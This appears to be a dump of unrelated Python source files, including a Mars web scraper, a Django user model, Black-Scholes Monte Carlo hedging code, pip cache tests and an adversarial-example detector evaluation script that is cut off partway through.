ext | sha | content
---|---|---
py | 1a4f93fdae7dae7bc7195d7acc9b371544f0f1be | import pytest
from newchain_web3 import (
EthereumTesterProvider,
Web3,
)
from newchain_web3.providers.eth_tester.main import (
AsyncEthereumTesterProvider,
)
from newchain_web3.version import (
AsyncVersion,
BlockingVersion,
Version,
)
@pytest.fixture
def blocking_w3():
return Web3(
EthereumTesterProvider(),
modules={
'blocking_version': BlockingVersion,
'legacy_version': Version
})
@pytest.fixture
def async_w3():
return Web3(
AsyncEthereumTesterProvider(),
middlewares=[],
modules={
'async_version': AsyncVersion,
})
def test_blocking_version(blocking_w3):
assert blocking_w3.blocking_version.api == blocking_w3.legacy_version.api
assert blocking_w3.blocking_version.node == blocking_w3.legacy_version.node
assert blocking_w3.blocking_version.ethereum == blocking_w3.legacy_version.ethereum
@pytest.mark.asyncio
async def test_async_blocking_version(async_w3, blocking_w3):
assert async_w3.async_version.api == blocking_w3.legacy_version.api
assert await async_w3.async_version.node == blocking_w3.legacy_version.node
    with pytest.raises(
        ValueError,
        match="RPC Endpoint has not been implemented: eth_protocolVersion"
    ):
assert await async_w3.async_version.ethereum == blocking_w3.legacy_version.ethereum
|
py | 1a4f942e037d338d4447fe92bdae726ae115e5dd | #imports
from splinter import Browser
from bs4 import BeautifulSoup as soup
from webdriver_manager.chrome import ChromeDriverManager
import datetime as dt
#scrape all function
def scrape_all():
# need to return a json that has data to load into database (MongoDB)
# Set up Splinter
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
    # get data from the news page and add variables for the news title and paragraph
news_title, news_paragraph = scrape_news(browser)
# then add info to dictionary
marsData = {
"newsTitle": news_title,
"newsParagraph": news_paragraph,
"featuredImage": scrape_images(browser),
"facts": scrape_facts(browser),
"hemispheres": scrape_hemisphere_pages(browser),
"lastUpdated": dt.datetime.now()
}
#stop webdriver
browser.quit()
return marsData
#scrape the mars news page
def scrape_news(browser):
# Visit the Mars news site
url = 'https://redplanetscience.com/'
browser.visit(url)
# Optional delay for loading the page
browser.is_element_present_by_css('div.list_text', wait_time=1)
# Convert the browser html to a soup object
html = browser.html
news_soup = soup(html, 'html.parser')
slide_elem = news_soup.select_one('div.list_text')
#get title
news_title = slide_elem.find('div', class_='content_title').get_text()
#get paragraph
news_p= slide_elem.find('div', class_='article_teaser_body').get_text()
#return title and para
return news_title, news_p
#scrape through the feature image page
def scrape_images(browser):
    # visit the images page
featured_image_url = 'https://spaceimages-mars.com'
browser.visit(featured_image_url)
# Find and click the full image button
full_image_link = browser.find_by_tag('button')[1]
full_image_link.click()
#parsing through with soup
html = browser.html
img_soup = soup(html, 'html.parser')
#locating mars image
img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')
# Use the base url to create an absolute url
img_url = f'https://spaceimages-mars.com/{img_url_rel}'
return img_url
#scrape through facts page to get table
#grabbing the html code
def scrape_facts(browser):
facts_url = 'https://galaxyfacts-mars.com/'
browser.visit(facts_url)
html = browser.html
fact_soup = soup(html, 'html.parser')
#locating facts
facts_loc = fact_soup.find('div', class_="diagram mt-4")
fact_table = facts_loc.find('table') #getting html for fact table
facts = ""
#add text to facts
facts += str(fact_table)
return facts
#scrape hemisphere pages
def scrape_hemisphere_pages(browser):
hemi_url = 'https://marshemispheres.com/'
browser.visit(hemi_url)
# Create a list to hold the images and titles.
hemisphere_image_urls = []
# Get a list of all of the hemispheres
#links = browser.find_by_css('a.product-item img')
# Next, loop through those links, click the link, find the sample anchor, return the href
for i in range(4):
#make a dictionary for hemisphere
hemisphereInfo = {}
# We have to find the elements on each loop to avoid a stale element exception
browser.find_by_css('a.product-item img')[i].click()
# Next, we find the Sample image anchor tag and extract the href
sample = browser.links.find_by_text('Sample').first
hemisphereInfo["img_url"] = sample['href']
# Get Hemisphere title
hemisphereInfo['title'] = browser.find_by_css('h2.title').text
# Append hemisphere object to list
hemisphere_image_urls.append(hemisphereInfo)
# Finally, we navigate backwards
browser.back()
return hemisphere_image_urls
#run script
if __name__ == "__main__":
print(scrape_all()) |
py | 1a4f95465cb751b971c5d28d2067fe41b6956f22 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
# create user
if not email:
raise ValueError('Please provide a valid email')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
# create super user
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
# custom user, replace username with email
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
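# Example usage (illustrative; assumes this model is configured as
# AUTH_USER_MODEL and migrations have been applied):
#
#   user = User.objects.create_user(email='alice@example.com', password='s3cret')
#   admin = User.objects.create_superuser('admin@example.com', 'adminpass')
#   User.objects.get(email='alice@example.com')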
|
py | 1a4f954d43ee6801899132666595d337ec2a73d9 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.vision.v1p2beta1", manifest={"WebDetection",},
)
class WebDetection(proto.Message):
r"""Relevant information for the image from the Internet.
Attributes:
web_entities (Sequence[~.web_detection.WebDetection.WebEntity]):
Deduced entities from similar images on the
Internet.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images from the Internet.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images from the Internet.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
pages_with_matching_images (Sequence[~.web_detection.WebDetection.WebPage]):
Web pages containing the matching images from
the Internet.
visually_similar_images (Sequence[~.web_detection.WebDetection.WebImage]):
The visually similar image results.
best_guess_labels (Sequence[~.web_detection.WebDetection.WebLabel]):
Best guess text labels for the request image.
"""
class WebEntity(proto.Message):
r"""Entity deduced from similar images on the Internet.
Attributes:
entity_id (str):
Opaque entity ID.
score (float):
Overall relevancy score for the entity.
Not normalized and not comparable across
different image queries.
description (str):
Canonical description of the entity, in
English.
"""
entity_id = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
description = proto.Field(proto.STRING, number=3)
class WebImage(proto.Message):
r"""Metadata for online images.
Attributes:
url (str):
The result image URL.
score (float):
(Deprecated) Overall relevancy score for the
image.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
class WebPage(proto.Message):
r"""Metadata for web pages.
Attributes:
url (str):
The result web page URL.
score (float):
(Deprecated) Overall relevancy score for the
web page.
page_title (str):
Title for the web page, may contain HTML
markups.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images on the page.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images on the page.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
page_title = proto.Field(proto.STRING, number=3)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message="WebDetection.WebImage",
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=5, message="WebDetection.WebImage",
)
class WebLabel(proto.Message):
r"""Label to provide extra metadata for the web detection.
Attributes:
label (str):
Label for extra metadata.
language_code (str):
The BCP-47 language code for ``label``, such as "en-US" or
"sr-Latn". For more information, see
http://www.unicode.org/reports/tr35/#Unicode_locale_identifier.
"""
label = proto.Field(proto.STRING, number=1)
language_code = proto.Field(proto.STRING, number=2)
web_entities = proto.RepeatedField(proto.MESSAGE, number=1, message=WebEntity,)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=2, message=WebImage,
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=3, message=WebImage,
)
pages_with_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message=WebPage,
)
visually_similar_images = proto.RepeatedField(
proto.MESSAGE, number=6, message=WebImage,
)
best_guess_labels = proto.RepeatedField(proto.MESSAGE, number=8, message=WebLabel,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
py | 1a4f95883f31260019a05f999dbdb6d9f516cdbb | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import time
import bspline
import bspline.splinelab as splinelab
# The Black-Scholes prices
def bs_put(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = K * np.exp(-r * (T - t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1)
return price
def bs_call(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = S0 * norm.cdf(d1) - K * np.exp(-r * (T - t)) * norm.cdf(d2)
return price
def d1(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r + sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
def d2(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r - sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
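# Illustrative sanity check (added; `_check_put_call_parity` is not part of the
# original file): for European options the pricers above should satisfy
# put-call parity, C - P = S0 - K * exp(-r * (T - t)).
def _check_put_call_parity(t=0.0, S0=100.0, K=100.0, r=0.05, sigma=0.2, T=1.0):
    lhs = bs_call(t, S0, K, r, sigma, T) - bs_put(t, S0, K, r, sigma, T)
    rhs = S0 - K * np.exp(-r * (T - t))
    assert abs(lhs - rhs) < 1e-6, (lhs, rhs)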
class DiscreteBlackScholes:
"""
Class implementing discrete Black Scholes
DiscreteBlackScholes is class for pricing and hedging under
the real-world measure for a one-dimensional Black-Scholes setting
"""
def __init__(self,
s0,
strike,
vol,
T,
r,
mu,
numSteps,
numPaths):
"""
:param s0: initial price of the underlying
:param strike: option strike
:param vol: volatility
:param T: time to maturity, in years
:param r: risk-free rate,
:param mu: real drift, asset drift
:param numSteps: number of time steps
:param numPaths: number of Monte Carlo paths
"""
self.s0 = s0
self.strike = strike
self.vol = vol
self.T = T
self.r = r
self.mu = mu
self.numSteps = numSteps
self.numPaths = numPaths
self.dt = self.T / self.numSteps # time step
self.gamma = np.exp(-r * self.dt) # discount factor for one time step, i.e. gamma in the QLBS paper
self.sVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of stock values
# initialize half of the paths with stock price values ranging from 0.5 to 1.5 of s0
# the other half of the paths start with s0
half_paths = int(numPaths / 2)
if False:
# Grau (2010) "Applications of Least-Squares Regressions to Pricing and Hedging of Financial Derivatives"
self.sVals[:, 0] = (np.hstack((np.linspace(0.5 * s0, 1.5 * s0, half_paths),
s0 * np.ones(half_paths, 'float')))).T
self.sVals[:, 0] = s0 * np.ones(numPaths, 'float')
self.optionVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of option values
self.intrinsicVals = np.zeros((self.numPaths, self.numSteps + 1), 'float')
self.bVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of cash position values
self.opt_hedge = np.zeros((self.numPaths, self.numSteps + 1),
'float') # matrix of optimal hedges calculated from cross-sectional information F_t
self.X = None
self.data = None # matrix of features, i.e. self.X as sum of basis functions
self.delta_S_hat = None
# coef = 1.0/(2 * gamma * risk_lambda)
# override it by zero to have pure risk hedge
self.coef = 0.
def gen_paths(self):
"""
A simplest path generator
"""
np.random.seed(42)
# Spline basis of order p on knots k
z = np.random.normal(0, 1, size=(self.numSteps + 1, self.numPaths)).T
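        # Geometric Brownian Motion update used below (annotation added for clarity):
        #   S_{t+1} = S_t * exp((mu - 0.5 * sigma^2) * dt + sigma * sqrt(dt) * z_t)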
for t in range(self.numSteps):
self.sVals[:, t + 1] = self.sVals[:, t] * np.exp(
(self.mu - 0.5 * self.vol ** 2) * self.dt + (self.vol * np.sqrt(self.dt) * z[:, t + 1]))
print(self.sVals)
# like in QLBS
delta_S = self.sVals[:, 1:] - np.exp(self.r * self.dt) * self.sVals[:, :self.numSteps]
self.delta_S_hat = np.apply_along_axis(lambda x: x - np.mean(x), axis=0, arr=delta_S)
# state variable
# delta_t here is due to their conventions
self.X = - (self.mu - 0.5 * self.vol ** 2) * np.arange(self.numSteps + 1) * self.dt + np.log(self.sVals)
X_min = np.min(np.min(self.X))
X_max = np.max(np.max(self.X))
print('X.shape = ', self.X.shape)
print('X_min, X_max = ', X_min, X_max)
p = 4 # order of spline (as-is; 3 = cubic, 4: B-spline?)
ncolloc = 12
tau = np.linspace(X_min, X_max, ncolloc) # These are the sites to which we would like to interpolate
# k is a knot vector that adds endpoints repeats as appropriate for a spline of order p
# To get meaningful results, one should have ncolloc >= p+1
k = splinelab.aptknt(tau, p)
basis = bspline.Bspline(k, p)
num_basis = ncolloc # len(k) #
self.data = np.zeros((self.numSteps + 1, self.numPaths, num_basis))
print('num_basis = ', num_basis)
print('dim self.data = ', self.data.shape)
# fill it, expand function in finite dimensional space
# in neural network the basis is the neural network itself
t_0 = time.time()
for ix in np.arange(self.numSteps + 1):
x = self.X[:, ix]
self.data[ix, :, :] = np.array([basis(el) for el in x])
t_end = time.time()
print('\nTime Cost of basis expansion:', t_end - t_0, 'seconds')
def function_A_vec(self, t, reg_param=1e-3):
"""
function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!)
Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of data_mat
reg_param - a scalar, regularization parameter
Return:
- np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis
"""
X_mat = self.data[t, :, :]
num_basis_funcs = X_mat.shape[1]
this_dS = self.delta_S_hat[:, t]
hat_dS2 = (this_dS ** 2).reshape(-1, 1)
A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs)
return A_mat
def function_B_vec(self, t, Pi_hat):
"""
function_B_vec - compute vector B_{n} from Eq. (52) QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of delta_S_hat
Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values
Return:
B_vec - np.array() of dimension num_basis x 1
"""
tmp = Pi_hat * self.delta_S_hat[:, t] + self.coef * (np.exp((self.mu - self.r) * self.dt)) * self.sVals[:, t]
X_mat = self.data[t, :, :] # matrix of dimension N_MC x num_basis
B_vec = np.dot(X_mat.T, tmp)
return B_vec
def seed_intrinsic(self, strike=None, cp='P'):
"""
initilaize option value and intrinsic value for each node
"""
if strike is not None:
self.strike = strike
if cp == 'P':
# payoff function at maturity T: max(K - S(T),0) for all paths
self.optionVals = np.maximum(self.strike - self.sVals[:, -1], 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.strike - self.sVals, 0).copy()
elif cp == 'C':
# payoff function at maturity T: max(S(T) -K,0) for all paths
self.optionVals = np.maximum(self.sVals[:, -1] - self.strike, 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.sVals - self.strike, 0).copy()
else:
raise Exception('Invalid parameter: %s' % cp)
self.bVals[:, -1] = self.intrinsicVals[:, -1]
def roll_backward(self):
"""
Roll the price and optimal hedge back in time starting from maturity
"""
for t in range(self.numSteps - 1, -1, -1):
# determine the expected portfolio value at the next time node
piNext = self.bVals[:, t + 1] + self.opt_hedge[:, t + 1] * self.sVals[:, t + 1]
pi_hat = piNext - np.mean(piNext)
A_mat = self.function_A_vec(t)
B_vec = self.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
self.opt_hedge[:, t] = np.dot(self.data[t, :, :], phi)
self.bVals[:, t] = np.exp(-self.r * self.dt) * (
self.bVals[:, t + 1] + (self.opt_hedge[:, t + 1] - self.opt_hedge[:, t]) * self.sVals[:, t + 1])
# calculate the initial portfolio value
initPortfolioVal = self.bVals[:, 0] + self.opt_hedge[:, 0] * self.sVals[:, 0]
# use only the second half of the paths generated with paths starting from S0
optionVal = np.mean(initPortfolioVal)
optionValVar = np.std(initPortfolioVal)
delta = np.mean(self.opt_hedge[:, 0])
return optionVal, delta, optionValVar
if __name__ == "__main__":
np.random.seed(42)
strike_k = 95
test_vol = 0.2
test_mu = 0.03
dt = 0.01
rfr = 0.05
num_paths = 100
num_periods = 252
hMC = DiscreteBlackScholes(100, strike_k, test_vol, 1., rfr, test_mu, num_periods, num_paths)
hMC.gen_paths()
t = hMC.numSteps - 1
piNext = hMC.bVals[:, t+1] + 0.1 * hMC.sVals[:, t+1]
pi_hat = piNext - np.mean(piNext)
A_mat = hMC.function_A_vec(t)
B_vec = hMC.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
opt_hedge = np.dot(hMC.data[t, :, :], phi)
# plot the results
fig = plt.figure(figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.scatter(hMC.sVals[:,t], pi_hat)
ax1.set_title(r'Expected $\Pi_0$ vs. $S_t$')
ax1.set_xlabel(r'$S_t$')
ax1.set_ylabel(r'$\Pi_0$')
# input parameters
s0 = 100.0
strike = 100.0
r = 0.05
mu = 0.07 # 0.05
vol = 0.4
T = 1.0
# Simulation Parameters
numPaths = 50000 # number of Monte Carlo trials
numSteps = 6
# create the class object
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
# calculation
hMC.gen_paths()
hMC.seed_intrinsic()
option_val, delta, option_val_variance = hMC.roll_backward()
    bs_put_value = bs_put(0, s0, K=strike, r=r, sigma=vol, T=T)
print('Option value = ', option_val)
print('Option value variance = ', option_val_variance)
print('Option delta = ', delta)
    print('BS put value', bs_put_value)
strikes = np.linspace(85, 110, 6)
results = [None] * len(strikes)
bs_prices = np.zeros(len(strikes))
bs_deltas = np.zeros(len(strikes))
numPaths = 50000
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
hMC.gen_paths()
for ix, k_strike in enumerate(strikes):
hMC.seed_intrinsic(k_strike)
results[ix] = hMC.roll_backward()
bs_prices[ix] = bs_put(0, s0, K=k_strike, r=r, sigma=vol, T=T)
bs_deltas[ix] = norm.cdf(d1(s0, K=k_strike, r=r, sigma=vol, T=T)) - 1
print("BS price: ", bs_prices)
mc_prices = np.array([x[0] for x in results])
mc_deltas = np.array([x[1] for x in results])
price_variances = np.array([x[-1] for x in results])
prices_diff = mc_prices - bs_prices
deltas_diff = mc_deltas - bs_deltas
print("Price variances: ", price_variances)
|
py | 1a4f968708c13eb6dc99b6763d0793e7e45bc208 | """empty message
Revision ID: 3ca97c203761
Revises: ddc9ab150f3e
Create Date: 2021-05-11 14:59:39.803671
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3ca97c203761'
down_revision = 'ddc9ab150f3e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=80), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('image', sa.String(length=36), nullable=True),
sa.Column('slug', sa.String(length=255), nullable=True),
sa.Column('publish_date', sa.DateTime(), nullable=True),
sa.Column('live', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['author.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('post')
op.drop_table('category')
# ### end Alembic commands ###
|
py | 1a4f980dbfa8a1fc07e9c678fe43201bc3281b73 | """
Program 115
Study area.
Date 13.12.2020 (undetermined) hrs
@Author: Abraão A. Silva
"""
# Open a file for writing data.
arquivo = open('/home/abraao/Documentos/testando.txt', 'w')  # Mode 'w' overwrites the file.
while True:
    nome = str(input('Name: '))
    if nome.isdigit():
        print('Program terminated.')
break
else:
arquivo.write(nome+'\n')
arquivo.close()
# Or
arquivo = open('/home/abraao/Documentos/testando.txt', 'a')  # Mode 'a' appends one entry after another.
for n in range(3):
    nome = str(input('Name: '))
arquivo.write(nome+'\n')
arquivo.close()
|
py | 1a4f98905332db2ed492adf6a4a98a55a83a80ec | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 25 18:47:55 2018
@author: bokorn
"""
import cv2
import numpy as np
import tensorflow as tf
def convertSummary(val):
if(val.HasField('simple_value')):
return val.simple_value
elif(val.HasField('obsolete_old_style_histogram')):
raise NotImplementedError()
elif(val.HasField('image')):
return cv2.imdecode(np.frombuffer(val.image.encoded_image_string, np.uint8), cv2.IMREAD_COLOR)
elif(val.HasField('histo')):
return {'bins':val.histo.bucket, 'lims':val.histo.bucket_limit}
elif(val.HasField('audio')):
raise NotImplementedError()
elif(val.HasField('tensor')):
        raise NotImplementedError()
else:
        raise ValueError('Invalid summary type {}'.format(val))
def getSummaryData(path, tags):
if(type(tags) is str):
tags = [tags]
data = {}
for t in tags:
data[t] = []
try:
for e in tf.train.summary_iterator(path):
for v in e.summary.value:
if v.tag in tags:
data[v.tag].append([e.step, convertSummary(v)])
except Exception as e:
print(e)
pass
return data
def getWallTime(path):
data = []
try:
for e in tf.train.summary_iterator(path):
data.append([e.step, e.wall_time])
except Exception as e:
print(e)
pass
return data
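# Example usage (illustrative; the event-file path and tag names below are
# placeholders, not values from this module):
#
#   data = getSummaryData('events.out.tfevents.1234.host', ['loss', 'accuracy'])
#   loss_curve = data['loss']        # list of [step, value] pairs
#   wall_times = getWallTime('events.out.tfevents.1234.host')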
|
py | 1a4f98b28bd1740021ee5fd3efdf4e08dad3127f | import os
from pip._vendor.packaging.tags import Tag
from pip._internal.cache import WheelCache, _hash_dict
from pip._internal.models.format_control import FormatControl
from pip._internal.models.link import Link
from pip._internal.utils.compat import expanduser
from pip._internal.utils.misc import ensure_dir
def test_expands_path():
wc = WheelCache("~/.foo/", None)
assert wc.cache_dir == expanduser("~/.foo/")
def test_falsey_path_none():
wc = WheelCache(False, None)
assert wc.cache_dir is None
def test_subdirectory_fragment():
"""
Test the subdirectory URL fragment is part of the cache key.
"""
wc = WheelCache("~/.foo/", None)
link1 = Link("git+https://g.c/o/r#subdirectory=d1")
link2 = Link("git+https://g.c/o/r#subdirectory=d2")
assert wc.get_path_for_link(link1) != wc.get_path_for_link(link2)
def test_wheel_name_filter(tmpdir):
"""
Test the wheel cache filters on wheel name when several wheels
for different package are stored under the same cache directory.
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/package.tar.gz")
cache_path = wc.get_path_for_link(link)
ensure_dir(cache_path)
with open(os.path.join(cache_path, "package-1.0-py3-none-any.whl"), "w"):
pass
# package matches wheel name
cached_link = wc.get(link, "package", [Tag("py3", "none", "any")])
assert cached_link is not link
assert os.path.exists(cached_link.file_path)
# package2 does not match wheel name
assert wc.get(link, "package2", [Tag("py3", "none", "any")]) is link
def test_cache_hash():
h = _hash_dict({"url": "https://g.c/o/r"})
assert h == "72aa79d3315c181d2cc23239d7109a782de663b6f89982624d8c1e86"
h = _hash_dict({"url": "https://g.c/o/r", "subdirectory": "sd"})
assert h == "8b13391b6791bf7f3edeabb41ea4698d21bcbdbba7f9c7dc9339750d"
h = _hash_dict({"subdirectory": u"/\xe9e"})
assert h == "f83b32dfa27a426dec08c21bf006065dd003d0aac78e7fc493d9014d"
def test_get_path_for_link_legacy(tmpdir):
"""
Test that an existing cache entry that was created with the legacy hashing
mechanism is returned by WheelCache._get_candidates().
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/o/r")
path = wc.get_path_for_link(link)
legacy_path = wc.get_path_for_link_legacy(link)
assert path != legacy_path
ensure_dir(path)
with open(os.path.join(path, "test-1.0.0-pyz-none-any.whl"), "w"):
pass
ensure_dir(legacy_path)
with open(os.path.join(legacy_path, "test-1.0.0-pyx-none-any.whl"), "w"):
pass
expected_candidates = {
"test-1.0.0-pyx-none-any.whl", "test-1.0.0-pyz-none-any.whl"
}
candidates = {c[0] for c in wc._get_candidates(link, "test")}
assert candidates == expected_candidates
def test_get_with_legacy_entry_only(tmpdir):
"""
Test that an existing cache entry that was created with the legacy hashing
mechanism is actually returned in WheelCache.get().
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/o/r")
legacy_path = wc.get_path_for_link_legacy(link)
ensure_dir(legacy_path)
with open(os.path.join(legacy_path, "test-1.0.0-py3-none-any.whl"), "w"):
pass
cached_link = wc.get(link, "test", [Tag("py3", "none", "any")])
assert (
os.path.normcase(os.path.dirname(cached_link.file_path)) ==
os.path.normcase(legacy_path)
)
|
py | 1a4f98cfdb2d52f086dcc6df7a53f48693038b37 | import os
import sys
def test1():
target = os.path.join(os.path.dirname(__file__), 'test1.py')
os.execv(target, sys.argv)
def test2():
target = os.path.join( os.path.dirname(__file__), 'test2.py')
print("target = %s" %target)
    os.execl(sys.executable, 'python', target, *sys.argv[1:])
|
py | 1a4f99788e670ecd4d54a54d2fffbfa4105e9022 | import sys
sys.path.append(".")
import os
from datetime import datetime
import argparse
import logging
import glob
import random
import numpy as np
import torch
import torch.nn as nn
import misc.utils as utils
from misc.load_dataset import LoadDataset
from torch.utils.data import DataLoader
from models import *
from models.rr_detector import RRdetector
np.set_printoptions(precision=4, suppress=True, linewidth=120)
def preprocess(ae_data):
"""revert the mnist data back to one channel
"""
logging.warning("This will revert data to one channel.")
for idx in range(len(ae_data["x_ori"])):
if ae_data["x_ori"][idx].shape[-3] > 1:
ae_data["x_ori"][idx] = \
ae_data["x_ori"][idx].mean(dim=-3, keepdim=True)
for key in ae_data["x_adv"]:
for idx in range(len(ae_data["x_adv"][key])):
if ae_data["x_adv"][key][idx].shape[-3] > 1:
ae_data["x_adv"][key][idx] = \
ae_data["x_adv"][key][idx].mean(dim=-3, keepdim=True)
def test_whitebox(args, path, detector):
# format of ae_data, total 2400+ samples:
# ae_data["x_adv"]: dict(eps[float]:List(batch Tensor data, ...))
# ae_data["x_ori"]: List(torch.Tensor, ...)
# ae_data["y_ori"]: List(torch.Tensor, ...)
# x_adv and x_ori in range of (0,1), without normalization
for file in path.split(";"):
ae_data = torch.load(file)
x_adv_all = ae_data["x_adv"]
y_ori = ae_data["y_ori"]
x_ori = ae_data["x_ori"]
if args.dataset == "MNIST":
            # for MNIST, the data was saved with three channels
            preprocess(ae_data)  # converts x_ori / x_adv back to one channel in place
# test classifier on clean sample
clean_pred = []
for img, _ in zip(x_ori, y_ori):
# here we expect data in range [0, 1]
img = img.cuda()
y_pred = detector.classify_normal(img, len(img)).cpu()
clean_pred.append(y_pred)
clean_pred = torch.cat(clean_pred)
# concat each batch to one
y_ori = torch.cat(y_ori, dim=0)
cls_cor = (clean_pred == y_ori)
logging.info("cls acc: {}".format(cls_cor.sum().item() / len(cls_cor)))
all_acc = [[], []]
for eps in x_adv_all:
x_adv = x_adv_all[eps]
# concat each batch to one
x_adv = torch.cat(x_adv, dim=0)
adv_pred = detector.classify_normal(x_adv, args.batch_size)
all_pass, _ = detector.detect(x_adv, args.batch_size)
should_rej = (adv_pred != y_ori)
# attack suss rate: robust acc is
# 1 - #(pass and incorrect samples)/#(all perturbed samples)
# here is the #(pass and incorrect samples)
incor_pass = torch.logical_and(should_rej, all_pass.cpu())
rob_acc = 1. - torch.mean(incor_pass.float()).item()
# TPR: acc for (attack suss and reject) / attack suss
tp_fn = torch.logical_and(cls_cor, should_rej)
tp = torch.logical_and(
torch.logical_and(cls_cor, should_rej), all_pass.cpu() == 0
)
TPR = (tp.sum() / tp_fn.sum()).item()
logging.info("on AE: {} eps={}".format(file, eps))
logging.info("robust acc: {:.4f}".format(rob_acc))
logging.info("TPR: {:.4f}".format(TPR))
all_acc[0].append(rob_acc)
all_acc[1].append(TPR)
logging.info("Results: {}".format(np.array(all_acc)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Test MagNet AE detector")
parser.add_argument("--ae_path", type=str)
parser.add_argument("--dataset", default="cifar10", type=str)
parser.add_argument(
"--results_dir", default="./trained_models/ae_test", type=str)
parser.add_argument("--data_path", default="./dataset", type=str)
parser.add_argument("--img_size", default=(32, 32), type=tuple)
parser.add_argument("--batch_size", default=256, type=int)
parser.add_argument("--drop_rate", default=0.05, type=float)
args = parser.parse_args()
random.seed(1)
torch.random.manual_seed(1)
# define model according to dataset
if args.dataset == "MNIST":
classifier = Mnist2LayerNet
key = "model"
cls_norm = [[0.13], [0.31]]
args.img_size = (28, 28)
# RR params
weight = "trained_models/MNIST/PGDAT_Mnist2LayerNetBN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best.pth"
num_cla = 10
elif args.dataset == "cifar10":
classifier = densenet169
